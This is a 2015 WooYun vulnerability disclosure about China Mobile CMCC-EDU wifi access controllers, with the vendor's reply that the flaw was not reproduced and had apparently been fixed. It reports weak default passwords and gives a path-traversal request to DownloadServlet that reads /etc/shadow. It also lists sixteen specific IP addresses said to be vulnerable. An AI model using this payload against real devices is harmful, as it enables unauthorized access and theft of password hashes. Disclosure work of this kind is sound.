当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
中国移动大量AC可被控制外加任意文件下载(CMCC-EDU wifi)
相关厂商:
漏洞作者:
提交时间:
2015-05-12 11:06
修复时间:
2015-08-13 17:54
公开时间:
2015-08-13 17:54
漏洞类型:
默认配置不当
危害等级:
自评Rank:
20
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2015-05-12: 细节已通知厂商并且等待厂商处理中
2015-05-15: 厂商已经确认,细节仅向厂商公开
2015-05-18: 细节向第三方安全合作伙伴开放
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

弱口令,任意文件读取

详细说明:

AC 弱口令

1.png


是中国移动的设备 CMCC-EDU

2.png


任意文件下载

DownloadServlet?fileName=../../../../../../../../../../etc/shadow


通用,这个型号的AC都可以任意下载shadow

3.png

4.png

漏洞证明:

这部分IP全部有弱口令,和任意下载漏洞
http://111.9.11.67
http://111.9.11.2
http://111.9.11.46
http://111.9.11.62
http://111.9.11.6
http://111.9.11.58
http://111.9.11.51
http://111.9.11.50
http://111.9.11.43
http://111.9.11.38
http://111.9.11.30
http://111.9.11.26
http://111.9.11.22
http://111.9.11.18
http://111.9.11.14
http://111.9.11.11

修复方案:

你懂的

版权声明:转载请注明来源 路人甲@乌云


>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-15 17:53

厂商回复:

CNVD未复现所述情况(应为历史测试结果,中国移动已修复),已经转由CNCERT直接向中国移动集团公司转报,供其核查参考。

最新状态:

暂无